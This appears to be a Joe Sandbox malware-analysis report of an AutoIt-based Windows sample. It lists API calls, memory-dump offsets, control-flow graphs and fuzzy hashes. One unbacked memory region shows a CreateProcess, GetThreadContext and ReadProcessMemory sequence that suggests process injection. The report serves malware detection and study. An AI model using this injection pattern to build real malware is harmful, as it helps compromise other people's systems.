• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0116E127
Memory Dump Source
• Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116b000_file.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
• Instruction ID: 829f0b8ad1007e72e6d782a442eb4605839c1e39fd59028da5b779b275c1088f
• Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
• Instruction Fuzzy Hash: 1EA11A74E01209EBDF18CFA4C994BEEBBB9BF48304F208659E501BB280D7769A51CF55

Control-flow Graph

control_flow_graph 1405 ec49fb-ec4a25 call ecbcce RegOpenKeyExW 1408 ec4a2b-ec4a2f 1405->1408 1409 f341cc-f341e3 RegQueryValueExW 1405->1409 1410 f34246-f3424f RegCloseKey 1409->1410 1411 f341e5-f34222 call edf4ea call ec47b7 RegQueryValueExW 1409->1411 1416 f34224-f3423b call ec6a63 1411->1416 1417 f3423d-f34245 call ec47e2 1411->1417 1416->1417 1417->1410
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EC4A1D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F341DB
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F3421A
• RegCloseKey.ADVAPI32(?), ref: 00F34249
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: f22778e9e6752633f69c04596d99f39979d75069beddc945278d106eb2785c7e
• Instruction ID: 543864e479f1812e9a78479ad3e288b06463df0576cfdb84ce6e1afcf3939b47
• Opcode Fuzzy Hash: f22778e9e6752633f69c04596d99f39979d75069beddc945278d106eb2785c7e
• Instruction Fuzzy Hash: F6119075A01108BEDB10EBA8CD86EAF7BACEF15354F001059B506E3191EA71AE02E710

Control-flow Graph

control_flow_graph 1432 ec36b8-ec3728 CreateWindowExW * 2 ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC36E6
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3707
• ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC371B
• ShowWindow.USER32(00000000,?,?,?,?,00EC3AA3,?), ref: 00EC3724
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$CreateShow
                                                                                                                                                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                      • Opcode ID: 5096ce26bf0291a708c2a09848018e603c5177b45d675ebf64f1c22616558e5f
                                                                                                                                                                                                                                                      • Instruction ID: ddf1f264fe0e3e175c9fb3aba20e453c9d503eb92889c31ead36a329ff6506ff
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5096ce26bf0291a708c2a09848018e603c5177b45d675ebf64f1c22616558e5f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71F03A745402D87AE7315757AC08EB73E7DE7C7F20B00011ABA04E21B1C1650886FBB1

Control-flow Graph

control_flow_graph 1537 116dbe0-116dd29 call 116b830 call 116dad0 CreateFileW 1544 116dd30-116dd40 1537->1544 1545 116dd2b 1537->1545 1548 116dd47-116dd61 VirtualAlloc 1544->1548 1549 116dd42 1544->1549 1546 116dde0-116dde5 1545->1546 1550 116dd65-116dd7c ReadFile 1548->1550 1551 116dd63 1548->1551 1549->1546 1552 116dd80-116ddba call 116db10 call 116cad0 1550->1552 1553 116dd7e 1550->1553 1551->1546 1558 116ddd6-116ddde ExitProcess 1552->1558 1559 116ddbc-116ddd1 call 116db60 1552->1559 1553->1546 1558->1546 1559->1558
APIs
  • Part of subcall function 0116DAD0: Sleep.KERNELBASE(000001F4), ref: 0116DAE1
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0116DD1F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_116b000_file.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: WSYJ4T6SN1NSIWMPZMS
• API String ID: 2694422964-1721998372
• Opcode ID: a39448f628a229565429e2e8042730ccf0f803d486f6982b604da38572d1b205
• Instruction ID: 96f0bed32ab8bc737c0b451e3d922d7829f37f0130088242c6242005c10bb25b
• Opcode Fuzzy Hash: a39448f628a229565429e2e8042730ccf0f803d486f6982b604da38572d1b205
• Instruction Fuzzy Hash: D7519430E04248DBEF15DBE4D854BEEBB79AF18704F004199E249BB2C1D7BA1B44CBA5
APIs
• _memset.LIBCMT ref: 00EC522F
• _wcscpy.LIBCMT ref: 00EC5283
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC5293
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F33CB0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_memset_wcscpy
• String ID: Line:
• API String ID: 1053898822-1585850449
• Opcode ID: 928e536d94532156406a0fe54a95ee95426429650ab77ed4b1fc8f8947527f38
• Instruction ID: 8f929fd40925090fadf9d903c7c7b9c9cdc450e50ffa96c2af5a88f33367d0ad
• Opcode Fuzzy Hash: 928e536d94532156406a0fe54a95ee95426429650ab77ed4b1fc8f8947527f38
• Instruction Fuzzy Hash: A431B272408744AFC324EB50ED46FEB77ECAF44310F00561EF599A21A1DB71A68A9B92
APIs
  • Part of subcall function 00EC41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EC39FE,?,00000001), ref: 00EC41DB
• _free.LIBCMT ref: 00F336B7
• _free.LIBCMT ref: 00F336FE
  • Part of subcall function 00ECC833: __wsplitpath.LIBCMT ref: 00ECC93E
  • Part of subcall function 00ECC833: _wcscpy.LIBCMT ref: 00ECC953
  • Part of subcall function 00ECC833: _wcscat.LIBCMT ref: 00ECC968
  • Part of subcall function 00ECC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00ECC978
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 805182592-1757145024
• Opcode ID: 182a4ffac5602f4be5c256345794678b90f857f278efb049b2307930941ba835
• Instruction ID: 5feb193a17d0f06833eff7995f5d235cb7b5d277f7c133247cbdbd08c824cce9
• Opcode Fuzzy Hash: 182a4ffac5602f4be5c256345794678b90f857f278efb049b2307930941ba835
• Instruction Fuzzy Hash: EA915F71910219AFCF04EFA4CD52EEDB7B4BF08320F14442AF816BB291DB75AA55DB50
APIs
  • Part of subcall function 00EC5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00F81148,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC5392
  • Part of subcall function 00EC49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00EC4A1D
• _wcscat.LIBCMT ref: 00F32D80
• _wcscat.LIBCMT ref: 00F32DB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscat$FileModuleNameOpen
                                                                                                                                                                                                                                                      • String ID: \$\Include\
                                                                                                                                                                                                                                                      • API String ID: 3592542968-2640467822
                                                                                                                                                                                                                                                      • Opcode ID: 5193286e04657cb406638120fff0893393bda685f9157b32cf650ad518f38b42
                                                                                                                                                                                                                                                      • Instruction ID: d20953e59a451694eeb9e06c483fe4187e88051d11c2e55689f4f315520f6d99
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5193286e04657cb406638120fff0893393bda685f9157b32cf650ad518f38b42
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51D4724047448FC794EF55DE899EAB3F4FF49310B60192EF648A3261DB31A909EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __getstream.LIBCMT ref: 00EE34FE
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00EE3539
                                                                                                                                                                                                                                                      • __wopenfile.LIBCMT ref: 00EE3549
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                                                                                                                                                      • String ID: <G
                                                                                                                                                                                                                                                      • API String ID: 1820251861-2138716496
                                                                                                                                                                                                                                                      • Opcode ID: 8697e223e7b7548fcbff8bc0da0279dea9b6eb54d2f943229888057aaca2cb2a
                                                                                                                                                                                                                                                      • Instruction ID: ef7a447a4b35a8e17ce0ee6f8f008c13222ecce0edafec82b734da17a7c1ccd7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8697e223e7b7548fcbff8bc0da0279dea9b6eb54d2f943229888057aaca2cb2a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1110A70A0038E9FDB21BF778C4266E76E4AF45350F159425E429FB2C5EB30CA0197A2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00EDD28B,SwapMouseButtons,00000004,?), ref: 00EDD2BC
                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00EDD28B,SwapMouseButtons,00000004,?,?,?,?,00EDC865), ref: 00EDD2DD
                                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00EDD28B,SwapMouseButtons,00000004,?,?,?,?,00EDC865), ref: 00EDD2FF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                      • Opcode ID: a027dea29098a67943c27d9e3ea21c20dae932a4685e4d767b363825c20b79a8
                                                                                                                                                                                                                                                      • Instruction ID: a29cb0e513ac589f58c568b570840443d7e9e6b3108db42e867cd329f4c1fa04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a027dea29098a67943c27d9e3ea21c20dae932a4685e4d767b363825c20b79a8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E113C75615208FFDB208F68CC84EEF7BB8EF55744F10546AE805E7250D6319E42AB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0116D28B
                                                                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0116D321
                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0116D343
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654880838.000000000116B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116B000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_116b000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2438371351-0
                                                                                                                                                                                                                                                      • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                                                                                                                                                      • Instruction ID: cdba3f3ed075c6b9f719233f7ce2363313c05b4691e39bc1a28c6d8c81cb1d33
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B622E30A14258DBEB28CFA4D840BDEB375EF58304F1091A9D10DEB394E7769E91CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3877424927-0
                                                                                                                                                                                                                                                      • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                                                                                                                                                      • Instruction ID: ce1e21c36a70f545648f6abbbd179bb10fbdec985012069b28a276a586e6b353
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251BCB0A0068EABDB248F7B884856F77B5AF40324F24972EF425B72D0D7719F508B40
APIs
  • Part of subcall function 00EC4517: _fseek.LIBCMT ref: 00EC452F
  • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C65D
  • Part of subcall function 00F0C56D: _wcscmp.LIBCMT ref: 00F0C670
• _free.LIBCMT ref: 00F0C4DD
• _free.LIBCMT ref: 00F0C4E4
• _free.LIBCMT ref: 00F0C54F
  • Part of subcall function 00EE1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE7A85), ref: 00EE1CB1
  • Part of subcall function 00EE1C9D: GetLastError.KERNEL32(00000000,?,00EE7A85), ref: 00EE1CC3
• _free.LIBCMT ref: 00F0C557
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: 4a0e9689712cc86fb3d6977dd485a366c8ca69f90ee4738361ed8cff43ef1dd3
• Instruction ID: e8813c05a5353f79ed3d60fdc4ef17f9574dbeb11c8cb6bc80df6766d16a893a
• Opcode Fuzzy Hash: 4a0e9689712cc86fb3d6977dd485a366c8ca69f90ee4738361ed8cff43ef1dd3
• Instruction Fuzzy Hash: C1514BB5904219AFDF189F64DC81BADBBB9FF48314F1000AEB259B3281DB715A809F58
APIs
• _memset.LIBCMT ref: 00F33725
• GetOpenFileNameW.COMDLG32 ref: 00F3376F
  • Part of subcall function 00EC660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EC53B1,?,?,00EC61FF,?,00000000,00000001,00000000), ref: 00EC662F
  • Part of subcall function 00EC40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EC40C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
• Opcode ID: 59895e6d8730373523b2de7e7ea9c9f71ba08ade6be19bbcb01558541a028436
• Instruction ID: 2095b7840297fa8eb60cfd57b24db4630010814abb824d1f074759af32e6b3ed
• Opcode Fuzzy Hash: 59895e6d8730373523b2de7e7ea9c9f71ba08ade6be19bbcb01558541a028436
• Instruction Fuzzy Hash: FB21C6B1A10198ABCB01DFD4C845BDE7BF89F49304F00801AE405B7281DBB55A8A9F66
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00F0C72F
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00F0C746
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 5a2d09fc54a73ca9b81d3a6e4e9801b7689427919765bf0621f9d3b0f402925c
• Instruction ID: b296ac49c75749f7209366eff320a277fc14aa8507e9ec9e2cf1fe829c6b4c54
• Opcode Fuzzy Hash: 5a2d09fc54a73ca9b81d3a6e4e9801b7689427919765bf0621f9d3b0f402925c
• Instruction Fuzzy Hash: 04D05E7550030EBBDB50ABA0EC0EF8A777C9710704F0001A1BB54A50B1DAF0E7999B56
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3e698836ae71f283b4c51b286dfa762643913dd266956e2898861af98cc87d9
• Instruction ID: 94dc8bc1fc1015e002e66d329b8b0d0b27c7ad5f8da2fea4947150c517b7bd7d
• Opcode Fuzzy Hash: a3e698836ae71f283b4c51b286dfa762643913dd266956e2898861af98cc87d9
• Instruction Fuzzy Hash: 70F16A716083019FC710DF24C981B6AB7E5FF88314F14892EF9959B392DB35E949DB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EC5022
                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC50CB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                      • String ID:
